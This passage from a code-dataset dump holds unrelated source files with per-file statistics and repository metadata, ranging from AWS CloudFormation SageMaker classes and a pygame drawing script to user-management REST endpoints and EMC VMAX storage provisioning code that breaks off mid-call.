"ProjectName": (str, True),
"ServiceCatalogProvisioningDetails": (dict, True),
"Tags": (Tags, False),
}
class UserProfile(AWSObject):
"""
`UserProfile <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-userprofile.html>`__
"""
resource_type = "AWS::SageMaker::UserProfile"
props: PropsDictType = {
"DomainId": (str, True),
"SingleSignOnUserIdentifier": (str, False),
"SingleSignOnUserValue": (str, False),
"Tags": (Tags, False),
"UserProfileName": (str, True),
"UserSettings": (UserSettings, False),
}
class CognitoMemberDefinition(AWSProperty):
"""
`CognitoMemberDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-workteam-cognitomemberdefinition.html>`__
"""
props: PropsDictType = {
"CognitoClientId": (str, True),
"CognitoUserGroup": (str, True),
"CognitoUserPool": (str, True),
}
class MemberDefinition(AWSProperty):
"""
`MemberDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-workteam-memberdefinition.html>`__
"""
props: PropsDictType = {
"CognitoMemberDefinition": (CognitoMemberDefinition, True),
}
class NotificationConfiguration(AWSProperty):
"""
`NotificationConfiguration <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-workteam-notificationconfiguration.html>`__
"""
props: PropsDictType = {
"NotificationTopicArn": (str, True),
}
class Workteam(AWSObject):
"""
`Workteam <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-workteam.html>`__
"""
resource_type = "AWS::SageMaker::Workteam"
props: PropsDictType = {
"Description": (str, False),
"MemberDefinitions": ([MemberDefinition], False),
"NotificationConfiguration": (NotificationConfiguration, False),
"Tags": (Tags, False),
"WorkteamName": (str, False),
}
| 32.207761 | 206 | 0.680681 | 3,016 | 39,841 | 8.922082 | 0.106432 | 0.029433 | 0.038017 | 0.058754 | 0.457096 | 0.407745 | 0.395295 | 0.377978 | 0.366606 | 0.36066 | 0 | 0.001101 | 0.179363 | 39,841 | 1,236 | 207 | 32.233819 | 0.82193 | 0.351422 | 0 | 0.35814 | 1 | 0 | 0.235617 | 0.097267 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.003101 | 0 | 0.328682 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4843692979b67bbb7eade27d08ade8ca10f18066 | 2,012 | py | Python | magPi_05_mountains.py | oniMoNaku/thePit | f82d2dc70346e6188fca493a4b9373aa99ccfa32 | [
"Unlicense"
] | null | null | null | magPi_05_mountains.py | oniMoNaku/thePit | f82d2dc70346e6188fca493a4b9373aa99ccfa32 | [
"Unlicense"
] | null | null | null | magPi_05_mountains.py | oniMoNaku/thePit | f82d2dc70346e6188fca493a4b9373aa99ccfa32 | [
"Unlicense"
] | null | null | null | # today is 389f
# the python pit
# magPi - 05
# MOUNTAINS
import os, pygame; from pygame.locals import *
pygame.init(); clock = pygame.time.Clock()
os.environ['SDL_VIDEO_WINDOW_POS'] = 'center'
pygame.display.set_caption("Mountains")
screen=pygame.display.set_mode([600,382],0,32)
sky = pygame.Surface((600,255))
r=0; g=64; b=128
for l in range (0,255):
pygame.draw.rect(sky,(r,g,b),(0,l-1,600,l))
r=r+1;g=g+1;b=b+1
if r>=255: r=255
if g>=255: g=255
if b>=255: b=255
ground = pygame.Surface((600,128))
r=192; g=255; b=192
for l in range (0,128):
pygame.draw.rect(ground,(r,g,b),(0,l-2,600,l))
r=r-2;g=g-2;b=b-2
if r<=0: r=0
if g<=0: g=0
if b<=0: b=0
# Add in an extra surface for the mountains
mountain = pygame.Surface((600,128))
mountain.set_colorkey([0,0,0]) # Black is transparent
r=96; g=64; b=255
for l in range (0,128):
pygame.draw.rect(mountain,(r,g,b),(0,l-2,600,l))
r=r+2;g=g+2;b=b+2
if r>=255: r=255
if g>=255: g=255
if b>=255: b=255
# Draw some black (Transparent) polygons to create mountain peaks
# The screen is 600 wide so I've drawn 10 polygons at 60 pixels wide each
pygame.draw.polygon(mountain,[0,0,0],[(0,0),(60,0),(60,10),(0,40)])
pygame.draw.polygon(mountain,[0,0,0],[(60,0),(120,0),(120,30),(60,10)])
pygame.draw.polygon(mountain,[0,0,0],[(120,0),(180,0),(180,20),(120,30)])
pygame.draw.polygon(mountain,[0,0,0],[(180,0),(240,0),(240,50),(180,20)])
pygame.draw.polygon(mountain,[0,0,0],[(240,0),(300,0),(300,40),(240,50)])
pygame.draw.polygon(mountain,[0,0,0],[(300,0),(360,0),(360,10),(300,40)])
pygame.draw.polygon(mountain,[0,0,0],[(360,0),(420,0),(420,35),(360,10)])
pygame.draw.polygon(mountain,[0,0,0],[(420,0),(480,0),(480,45),(420,35)])
pygame.draw.polygon(mountain,[0,0,0],[(480,0),(540,0),(540,42),(480,45)])
pygame.draw.polygon(mountain,[0,0,0],[(540,0),(600,0),(600,15),(540,42)])
screen.blit(sky,(0,0))
screen.blit(ground,(0,255))
screen.blit(mountain,(0,128))
pygame.display.update()
pygame.time.wait(30000) | 34.101695 | 73 | 0.638171 | 416 | 2,012 | 3.072115 | 0.228365 | 0.039124 | 0.030516 | 0.195618 | 0.369327 | 0.349765 | 0.349765 | 0.21831 | 0.124413 | 0.07903 | 0 | 0.2 | 0.107853 | 2,012 | 59 | 74 | 34.101695 | 0.511978 | 0.12326 | 0 | 0.177778 | 0 | 0 | 0.019932 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022222 | 0 | 0.022222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4847f5739e2a2a4fe3f2279bc69fc734031f35e3 | 5,610 | py | Python | rest-service/manager_rest/rest/resources_v3/users.py | TS-at-WS/cloudify-manager | 3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc | [
"Apache-2.0"
] | null | null | null | rest-service/manager_rest/rest/resources_v3/users.py | TS-at-WS/cloudify-manager | 3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc | [
"Apache-2.0"
] | null | null | null | rest-service/manager_rest/rest/resources_v3/users.py | TS-at-WS/cloudify-manager | 3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc | [
"Apache-2.0"
] | null | null | null | #########
# Copyright (c) 2016 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from flask_security import current_user
from manager_rest import constants
from manager_rest.storage import models, user_datastore
from manager_rest.security.authorization import authorize
from manager_rest.security import (SecuredResource,
MissingPremiumFeatureResource)
from manager_rest.manager_exceptions import BadParametersError
from .. import rest_decorators, rest_utils
from ..responses_v3 import UserResponse
try:
from cloudify_premium.multi_tenancy.secured_tenant_resource \
import SecuredMultiTenancyResource
except ImportError:
SecuredMultiTenancyResource = MissingPremiumFeatureResource
class User(SecuredResource):
@authorize('user_get_self')
@rest_decorators.marshal_with(UserResponse)
def get(self):
"""
Get details for the current user
"""
return user_datastore.get_user(current_user.username)
class Users(SecuredMultiTenancyResource):
@authorize('user_list')
@rest_decorators.marshal_with(UserResponse)
@rest_decorators.create_filters(models.User)
@rest_decorators.paginate
@rest_decorators.sortable(models.User)
@rest_decorators.search('username')
def get(self, multi_tenancy, _include=None, filters=None, pagination=None,
sort=None, search=None, **kwargs):
"""
List users
"""
return multi_tenancy.list_users(
_include,
filters,
pagination,
sort,
search
)
@authorize('user_create')
@rest_decorators.marshal_with(UserResponse)
@rest_decorators.no_external_authenticator('create user')
def put(self, multi_tenancy):
"""
Create a user
"""
request_dict = rest_utils.get_json_and_verify_params(
{
'username': {
'type': unicode,
},
'password': {
'type': unicode,
},
'role': {
'type': unicode,
'optional': True,
},
}
)
# The password shouldn't be validated here
password = request_dict.pop('password')
password = rest_utils.validate_and_decode_password(password)
rest_utils.validate_inputs(request_dict)
role = request_dict.get('role', constants.DEFAULT_SYSTEM_ROLE)
rest_utils.verify_role(role, is_system_role=True)
return multi_tenancy.create_user(
request_dict['username'],
password,
role,
)
class UsersId(SecuredMultiTenancyResource):
@authorize('user_update')
@rest_decorators.marshal_with(UserResponse)
def post(self, username, multi_tenancy):
"""
Set password/role for a certain user
"""
request_dict = rest_utils.get_json_and_verify_params()
password = request_dict.get('password')
role_name = request_dict.get('role')
if password:
if role_name:
raise BadParametersError('Both `password` and `role` provided')
password = rest_utils.validate_and_decode_password(password)
return multi_tenancy.set_user_password(username, password)
elif role_name:
rest_utils.verify_role(role_name, is_system_role=True)
return multi_tenancy.set_user_role(username, role_name)
else:
raise BadParametersError('Neither `password` nor `role` provided')
@authorize('user_get')
@rest_decorators.marshal_with(UserResponse)
def get(self, username, multi_tenancy):
"""
Get details for a single user
"""
rest_utils.validate_inputs({'username': username})
return multi_tenancy.get_user(username)
@authorize('user_delete')
@rest_decorators.marshal_with(UserResponse)
@rest_decorators.no_external_authenticator('delete user')
def delete(self, username, multi_tenancy):
"""
Delete a user
"""
rest_utils.validate_inputs({'username': username})
return multi_tenancy.delete_user(username)
class UsersActive(SecuredMultiTenancyResource):
@authorize('user_set_activated')
@rest_decorators.marshal_with(UserResponse)
def post(self, username, multi_tenancy):
"""
Activate a user
"""
request_dict = rest_utils.get_json_and_verify_params({'action'})
if request_dict['action'] == 'activate':
return multi_tenancy.activate_user(username)
else:
return multi_tenancy.deactivate_user(username)
class UsersUnlock(SecuredMultiTenancyResource):
@authorize('user_unlock')
@rest_decorators.marshal_with(UserResponse)
def post(self, username, multi_tenancy):
"""
Unlock user account
"""
rest_utils.validate_inputs({'username': username})
return multi_tenancy.unlock_user(username)
| 34.207317 | 79 | 0.659893 | 595 | 5,610 | 5.984874 | 0.287395 | 0.057287 | 0.045493 | 0.056164 | 0.305251 | 0.276327 | 0.276327 | 0.242909 | 0.18843 | 0.172423 | 0 | 0.002149 | 0.253476 | 5,610 | 163 | 80 | 34.417178 | 0.848138 | 0.145633 | 0 | 0.198113 | 0 | 0 | 0.067815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075472 | false | 0.09434 | 0.09434 | 0 | 0.311321 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
48514c4855c82f6511561bc091163063091c1e9c | 664 | py | Python | ptranking/ltr_adhoc/util/one_hot_utils.py | junj2ejj/ptranking.github.io | 06fa9751dd2eca89749ba4bb9641e4272cfc30a1 | [
"MIT"
] | 1 | 2020-09-24T10:38:53.000Z | 2020-09-24T10:38:53.000Z | ptranking/ltr_adhoc/util/one_hot_utils.py | junj2ejj/ptranking.github.io | 06fa9751dd2eca89749ba4bb9641e4272cfc30a1 | [
"MIT"
] | null | null | null | ptranking/ltr_adhoc/util/one_hot_utils.py | junj2ejj/ptranking.github.io | 06fa9751dd2eca89749ba4bb9641e4272cfc30a1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Description
"""
import torch
from ptranking.ltr_global import global_gpu as gpu
def get_one_hot_reprs(batch_stds):
""" Get one-hot representation of batch ground-truth labels """
batch_size = batch_stds.size(0)
hist_size = batch_stds.size(1)
int_batch_stds = batch_stds.type(torch.cuda.LongTensor) if gpu else batch_stds.type(torch.LongTensor)
hot_batch_stds = torch.cuda.FloatTensor(batch_size, hist_size, 3) if gpu else torch.FloatTensor(batch_size, hist_size, 3)
hot_batch_stds.zero_()
hot_batch_stds.scatter_(2, torch.unsqueeze(int_batch_stds, 2), 1)
return hot_batch_stds
| 30.181818 | 125 | 0.74247 | 105 | 664 | 4.409524 | 0.428571 | 0.213823 | 0.103672 | 0.073434 | 0.12527 | 0.12527 | 0 | 0 | 0 | 0 | 0 | 0.014109 | 0.146084 | 664 | 21 | 126 | 31.619048 | 0.802469 | 0.167169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
485f7ffc14de09acdf65c094b7c9e15395d4ca1b | 1,001 | py | Python | problems/095.py | JoshKarpel/Euler | 9c4a89cfe4b0114d84a82e2b2894c7b8af815e93 | [
"MIT"
] | 1 | 2017-09-20T22:26:24.000Z | 2017-09-20T22:26:24.000Z | problems/095.py | JoshKarpel/euler-python | 9c4a89cfe4b0114d84a82e2b2894c7b8af815e93 | [
"MIT"
] | null | null | null | problems/095.py | JoshKarpel/euler-python | 9c4a89cfe4b0114d84a82e2b2894c7b8af815e93 | [
"MIT"
] | null | null | null | from problems import utils, mymath
@utils.memoize
def sum_proper_factors(n):
return sum(mymath.proper_factorization(n))
def solve():
upper_bound = 1000000
chains = dict()
for start_number in range(1, upper_bound):
chain = [start_number]
current_number = sum_proper_factors(start_number)
while current_number != start_number:
if current_number > upper_bound or current_number == 0 or len(chain) > 100:
break
elif current_number in chains:
chain += chains[current_number]
break
else:
chain.append(current_number)
current_number = sum_proper_factors(current_number)
if current_number == start_number:
chains[start_number] = chain
chain_lengths = {i: len(chains[i]) for i in chains}
max_key = mymath.key_of_max_value(chain_lengths)
return min(chains[max_key])
if __name__ == '__main__':
print(solve())
| 26.342105 | 87 | 0.632368 | 122 | 1,001 | 4.852459 | 0.385246 | 0.219595 | 0.081081 | 0.074324 | 0.118243 | 0.118243 | 0 | 0 | 0 | 0 | 0 | 0.016807 | 0.286713 | 1,001 | 37 | 88 | 27.054054 | 0.812325 | 0 | 0 | 0.076923 | 0 | 0 | 0.007992 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.038462 | 0.038462 | 0.192308 | 0.038462 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4868d79bbf2ff6bbae4f4cb4d9abf9fab912436f | 724 | py | Python | ansiblelater/rules/CheckScmInSrc.py | ankitdobhal/ansible-later | a107cd2821e310fd459a7f9b802d5794f2b96f35 | [
"MIT"
] | 38 | 2020-10-14T09:40:58.000Z | 2022-03-17T10:45:22.000Z | ansiblelater/rules/CheckScmInSrc.py | ankitdobhal/ansible-later | a107cd2821e310fd459a7f9b802d5794f2b96f35 | [
"MIT"
] | 188 | 2020-09-29T09:43:54.000Z | 2022-03-04T08:45:42.000Z | ansiblelater/rules/CheckScmInSrc.py | ankitdobhal/ansible-later | a107cd2821e310fd459a7f9b802d5794f2b96f35 | [
"MIT"
] | 4 | 2021-02-10T03:35:19.000Z | 2022-01-17T15:54:39.000Z | from ansible.parsing.yaml.objects import AnsibleMapping
from ansiblelater.standard import StandardBase
class CheckScmInSrc(StandardBase):
sid = "ANSIBLE0005"
description = "Use `scm:` key rather than `src: scm+url`"
helptext = "usage of `src: scm+url` not recommended"
version = "0.1"
types = ["rolesfile"]
def check(self, candidate, settings):
roles, errors = self.get_tasks(candidate, settings)
if not errors:
for role in roles:
if isinstance(role, AnsibleMapping):
if "+" in role.get("src"):
errors.append(self.Error(role["__line__"], self.helptext))
return self.Result(candidate.path, errors)
| 30.166667 | 82 | 0.627072 | 81 | 724 | 5.54321 | 0.641975 | 0.026726 | 0.040089 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011257 | 0.263812 | 724 | 23 | 83 | 31.478261 | 0.831144 | 0 | 0 | 0 | 0 | 0 | 0.15884 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.125 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
486936b454230e71425f5f21ffabf8c3b40a119e | 595 | py | Python | DMOJ/CCC/slot machine.py | eddiegz/Personal-C | f7869826216e5c665f8f646502141f0dc680e545 | [
"MIT"
] | 3 | 2021-05-15T08:18:09.000Z | 2021-05-17T04:41:57.000Z | DMOJ/CCC/slot machine.py | eddiegz/Personal-C | f7869826216e5c665f8f646502141f0dc680e545 | [
"MIT"
] | null | null | null | DMOJ/CCC/slot machine.py | eddiegz/Personal-C | f7869826216e5c665f8f646502141f0dc680e545 | [
"MIT"
] | null | null | null | quarter=int(input())
p1=int(input())
p2=int(input())
p3=int(input())
time=0
while quarter>0:
if quarter == 0:
continue
p1+=1
quarter-=1
time+=1
if p1==35:
quarter+=30
p1=0
if quarter == 0:
continue
time+=1
p2+=1
quarter-=1
if p2==100:
p2=0
quarter+=60
if quarter == 0:
continue
p3+=1
time+=1
quarter-=1
if p3==10:
quarter+=9
p3=0
print(f'Martha plays {time} times before going broke.')
| 16.081081 | 56 | 0.438655 | 77 | 595 | 3.38961 | 0.337662 | 0.122605 | 0.114943 | 0.206897 | 0.145594 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122024 | 0.435294 | 595 | 37 | 57 | 16.081081 | 0.654762 | 0 | 0 | 0.387097 | 0 | 0 | 0.080357 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4869a5e537b1616b1387d41f76532922834d0c3e | 327 | py | Python | project/app/migrations/0003_auto_20210125_0924.py | dbinetti/kidsallin | 147491cdfbe812ffde91725193ec16c03083c1da | [
"BSD-3-Clause"
] | null | null | null | project/app/migrations/0003_auto_20210125_0924.py | dbinetti/kidsallin | 147491cdfbe812ffde91725193ec16c03083c1da | [
"BSD-3-Clause"
] | null | null | null | project/app/migrations/0003_auto_20210125_0924.py | dbinetti/kidsallin | 147491cdfbe812ffde91725193ec16c03083c1da | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 3.1.5 on 2021-01-25 16:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app', '0002_auto_20210124_0610'),
]
operations = [
migrations.RenameModel(
old_name='Parent',
new_name='Account',
),
]
| 18.166667 | 47 | 0.590214 | 36 | 327 | 5.222222 | 0.861111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134783 | 0.296636 | 327 | 17 | 48 | 19.235294 | 0.682609 | 0.137615 | 0 | 0 | 1 | 0 | 0.139286 | 0.082143 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
486abe98f15277d75707a2bda0dddf48de43bab7 | 28,203 | py | Python | cinder/volume/drivers/emc/emc_vmax_provision.py | kazum/cinder | 370b8e60c3166b289c8da924a227dd1bc63f8b8a | [
"Apache-2.0"
] | null | null | null | cinder/volume/drivers/emc/emc_vmax_provision.py | kazum/cinder | 370b8e60c3166b289c8da924a227dd1bc63f8b8a | [
"Apache-2.0"
] | null | null | null | cinder/volume/drivers/emc/emc_vmax_provision.py | kazum/cinder | 370b8e60c3166b289c8da924a227dd1bc63f8b8a | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2012 - 2014 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from cinder import exception
from cinder.i18n import _, _LE
from cinder.openstack.common import log as logging
from cinder.volume.drivers.emc import emc_vmax_utils
LOG = logging.getLogger(__name__)
STORAGEGROUPTYPE = 4
POSTGROUPTYPE = 3
EMC_ROOT = 'root/emc'
THINPROVISIONINGCOMPOSITE = 32768
THINPROVISIONING = 5
class EMCVMAXProvision(object):
"""Provisioning Class for SMI-S based EMC volume drivers.
This Provisioning class is for EMC volume drivers based on SMI-S.
It supports VMAX arrays.
"""
def __init__(self, prtcl):
self.protocol = prtcl
self.utils = emc_vmax_utils.EMCVMAXUtils(prtcl)
def delete_volume_from_pool(
self, conn, storageConfigservice, volumeInstanceName, volumeName):
"""Given the volume instance remove it from the pool.
:param conn: connection the the ecom server
:param storageConfigservice: volume created from job
:param volumeInstanceName: the volume instance name
:param volumeName: the volume name (String)
:param rc: return code
"""
rc, job = conn.InvokeMethod(
'EMCReturnToStoragePool', storageConfigservice,
TheElements=[volumeInstanceName])
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Delete Volume: %(volumeName)s. "
"Return code: %(rc)lu. Error: %(error)s")
% {'volumeName': volumeName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc
def create_volume_from_pool(
self, conn, storageConfigService, volumeName,
poolInstanceName, volumeSize):
"""Create the volume in the specified pool.
:param conn: the connection information to the ecom server
:param storageConfigService: the storage configuration service
:param volumeName: the volume name (String)
:param poolInstanceName: the pool instance name to create
the dummy volume in
:param volumeSize: volume size (String)
:returns: volumeDict - the volume dict
"""
rc, job = conn.InvokeMethod(
'CreateOrModifyElementFromStoragePool',
storageConfigService, ElementName=volumeName,
InPool=poolInstanceName,
ElementType=self.utils.get_num(THINPROVISIONING, '16'),
Size=self.utils.get_num(volumeSize, '64'),
EMCBindElements=False)
LOG.debug("Create Volume: %(volumename)s Return code: %(rc)lu"
% {'volumename': volumeName,
'rc': rc})
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Create Volume: %(volumeName)s. "
"Return code: %(rc)lu. Error: %(error)s")
% {'volumeName': volumeName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
# Find the newly created volume
volumeDict = self.get_volume_dict_from_job(conn, job['Job'])
return volumeDict, rc
def create_and_get_storage_group(self, conn, controllerConfigService,
storageGroupName, volumeInstanceName):
"""Create a storage group and return it.
:param conn: the connection information to the ecom server
:param controllerConfigService: the controller configuration service
:param storageGroupName: the storage group name (String
:param volumeInstanceName: the volume instance name
:returns: foundStorageGroupInstanceName - instance name of the
default storage group
"""
rc, job = conn.InvokeMethod(
'CreateGroup', controllerConfigService, GroupName=storageGroupName,
Type=self.utils.get_num(STORAGEGROUPTYPE, '16'),
Members=[volumeInstanceName])
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Create Group: %(groupName)s. "
"Return code: %(rc)lu. Error: %(error)s")
% {'groupName': storageGroupName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
foundStorageGroupInstanceName = self._find_new_storage_group(
conn, job, storageGroupName)
return foundStorageGroupInstanceName
def create_storage_group_no_members(
self, conn, controllerConfigService, groupName):
"""Create a new storage group that has no members.
:param conn: connection the ecom server
:param controllerConfigService: the controller configuration service
:param groupName: the proposed group name
:returns: foundStorageGroupInstanceName - the instance Name of
the storage group
"""
rc, job = conn.InvokeMethod(
'CreateGroup', controllerConfigService, GroupName=groupName,
Type=self.utils.get_num(STORAGEGROUPTYPE, '16'),
DeleteWhenBecomesUnassociated=False)
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Create Group: %(groupName)s. "
"Return code: %(rc)lu. Error: %(error)s")
% {'groupName': groupName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
foundStorageGroupInstanceName = self._find_new_storage_group(
conn, job, groupName)
return foundStorageGroupInstanceName
def _find_new_storage_group(
self, conn, maskingGroupDict, storageGroupName):
"""After creating an new storage group find it and return it.
:param conn: connection the ecom server
:param maskingGroupDict: the maskingGroupDict dict
:param storageGroupName: storage group name (String)
:returns: maskingGroupDict['MaskingGroup']
"""
foundStorageGroupInstanceName = None
if 'MaskingGroup' in maskingGroupDict:
foundStorageGroupInstanceName = maskingGroupDict['MaskingGroup']
return foundStorageGroupInstanceName
def get_volume_dict_from_job(self, conn, jobInstance):
"""Given the jobInstance determine the volume Instance.
:param conn: the ecom connection
:param jobInstance: the instance of a job
:returns: volumeDict - an instance of a volume
"""
associators = conn.Associators(
jobInstance,
ResultClass='EMC_StorageVolume')
volpath = associators[0].path
volumeDict = {}
volumeDict['classname'] = volpath.classname
keys = {}
keys['CreationClassName'] = volpath['CreationClassName']
keys['SystemName'] = volpath['SystemName']
keys['DeviceID'] = volpath['DeviceID']
keys['SystemCreationClassName'] = volpath['SystemCreationClassName']
volumeDict['keybindings'] = keys
return volumeDict
def remove_device_from_storage_group(
self, conn, controllerConfigService, storageGroupInstanceName,
volumeInstanceName, volumeName):
"""Remove a volume from a storage group.
:param conn: the connection to the ecom server
:param controllerConfigService: the controller configuration service
:param storageGroupInstanceName: the instance name of the storage group
:param volumeInstanceName: the instance name of the volume
:param volumeName: the volume name (String)
:returns: rc - the return code of the job
"""
rc, jobDict = conn.InvokeMethod('RemoveMembers',
controllerConfigService,
MaskingGroup=storageGroupInstanceName,
Members=[volumeInstanceName])
if rc != 0L:
rc, errorDesc = self.utils.wait_for_job_complete(conn, jobDict)
if rc != 0L:
exceptionMessage = (_(
"Error removing volume %(vol)s. %(error)s")
% {'vol': volumeName, 'error': errorDesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc
def add_members_to_masking_group(
self, conn, controllerConfigService, storageGroupInstanceName,
volumeInstanceName, volumeName):
"""Add a member to a masking group group.
:param conn: the connection to the ecom server
:param controllerConfigService: the controller configuration service
:param storageGroupInstanceName: the instance name of the storage group
:param volumeInstanceName: the instance name of the volume
:param volumeName: the volume name (String)
"""
rc, job = conn.InvokeMethod(
'AddMembers', controllerConfigService,
MaskingGroup=storageGroupInstanceName,
Members=[volumeInstanceName])
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error mapping volume %(vol)s. %(error)s")
% {'vol': volumeName, 'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
def unbind_volume_from_storage_pool(
self, conn, storageConfigService, poolInstanceName,
volumeInstanceName, volumeName):
"""Unbind a volume from a pool and return the unbound volume.
:param conn: the connection information to the ecom server
:param storageConfigService: the storage configuration service
instance name
:param poolInstanceName: the pool instance name
:param volumeInstanceName: the volume instance name
:param volumeName: the volume name
:returns: unboundVolumeInstance - the unbound volume instance
"""
rc, job = conn.InvokeMethod(
'EMCUnBindElement',
storageConfigService,
InPool=poolInstanceName,
TheElement=volumeInstanceName)
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error unbinding volume %(vol)s from pool. %(error)s")
% {'vol': volumeName, 'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc, job
def modify_composite_volume(
self, conn, elementCompositionService, theVolumeInstanceName,
inVolumeInstanceName):
"""Given a composite volume add a storage volume to it.
:param conn: the connection to the ecom
:param elementCompositionService: the element composition service
:param theVolumeInstanceName: the existing composite volume
:param inVolumeInstanceName: the volume you wish to add to the
composite volume
:returns: rc - return code
:returns: job - job
"""
rc, job = conn.InvokeMethod(
'CreateOrModifyCompositeElement',
elementCompositionService,
